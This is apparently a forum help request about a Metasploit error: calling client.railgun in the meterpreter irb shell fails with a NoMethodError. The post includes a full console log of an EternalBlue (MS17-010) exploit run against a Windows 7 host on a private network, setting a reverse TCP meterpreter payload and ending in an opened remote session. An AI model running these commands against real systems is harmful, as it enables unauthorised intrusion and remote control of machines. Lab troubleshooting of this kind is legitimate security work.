I am having some trouble trying to run some commands through meterpreter; with the irb interpreter running I get the following output:
```
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.0.101:4444
[+] 192.168.0.102:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.102:445 - Connecting to target for exploitation.
[+] 192.168.0.102:445 - Connection established for exploitation.
[+] 192.168.0.102:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.102:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.102:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.0.102:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.0.102:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.0.102:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.102:445 - Starting non-paged pool grooming
[+] 192.168.0.102:445 - Sending SMBv2 buffers
[+] 192.168.0.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.102:445 - Sending final SMBv2 buffers.
[*] 192.168.0.102:445 - Sending last fragment of exploit packet!
[*] 192.168.0.102:445 - Receiving response from exploit packet
[+] 192.168.0.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.102:445 - Sending egg to corrupted connection.
[*] 192.168.0.102:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.0.102
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.102:49287) at 2019-06-17 21:08:26 -0300
[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > irb
[*] Starting IRB shell...
[*] You are in the "client" (session) object
irb: warn: can't alias kill from irb_kill.
>> client.railgun.known_dll_names
Traceback (most recent call last):
        16: from /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1363:in `cmd_sessions'
        15: from /usr/share/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'
        14: from /usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:575:in `_interact'
        13: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
        12: from /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:146:in `run'
        11: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
        10: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
         9: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
         8: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
         7: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:105:in `run_command'
         6: from /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
         5: from /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:573:in `cmd_irb'
         4: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
         3: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
         2: from /usr/share/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
         1: from (irb):1
NoMethodError (undefined method `railgun' for nil:NilClass)
>>
```
I have forked and installed msf as a developer, without any problems I think… setting up the whole environment as described in https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
```
# uname -a
Linux parrot 5.1.0-parrot1-3t-amd64 #1 SMP Parrot 5.1.3-1parrot1.3t (2019-05-20) x86_64 GNU/Linux
```
(installed via Debian Standard)
It’s not a multiboot configuration.
```
# gem --version
2.7.6.2
blabla/git/metasploit-framework# cat .ruby_version
2.6.2
```
I installed RVM to manage the Ruby versions.
I tried to take some hints from the Railgun API extension and some other sources (listed below), without success, so please show me the light at the end of the tunnel.
I would appreciate it if someone could guide me in my noob first steps…
https://rubyfu.net/module-0x5-or-exploitation-kung-fu/metasploit/meterpreter/railgun-api-extension
https://docs.ruby-lang.org/en/2.6.0/IRB/IrbLoader.html#method-i-irb_load
https://www.darkoperator.com/blog/2017/10/21/basics-of-the-metasploit-framework-irb-setup
Many thanks